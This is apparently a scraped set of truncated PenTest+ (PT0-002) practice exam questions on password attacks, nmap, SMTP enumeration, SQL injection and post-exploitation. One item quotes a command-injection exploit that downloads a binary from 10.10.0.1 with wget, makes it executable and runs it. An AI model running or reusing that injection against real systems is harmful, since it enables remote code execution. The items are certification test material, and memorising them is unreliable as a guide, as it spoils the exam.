PT0-002 exam

autonumA penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?A . HashcatB . MimikatzC . PatatorD . John the RipperView AnswerAnswer: C Explanation: https://www.kali.org/tools/patator/

autonumDRAG DROP You are a penetration tester reviewing a client’s website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like...

autonumA penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?A . /var/log/messagesB ....

autonumA penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?A . nmap -iL results 192.168.0.10-100B . nmap 192.168.0.10-100 -O > resultsC . nmap -A 192.168.0.10-100 -oX...

autonumA company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has...

autonumWhich of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?A . The IP address is wrong.B . The server is unreachable.C . The IP address is on the blocklist.D . The IP address is on the allow list.View AnswerAnswer: B Explanation:...

autonumA penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?A . Alternate data streamsB . PowerShell...

autonumA mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?A . VRFY and EXPNB . VRFY and...

autonumA penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted? A. SQL injection B. HTML injection C. Remote command injection D. DLL injectionView AnswerAnswer:...

autonumA penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....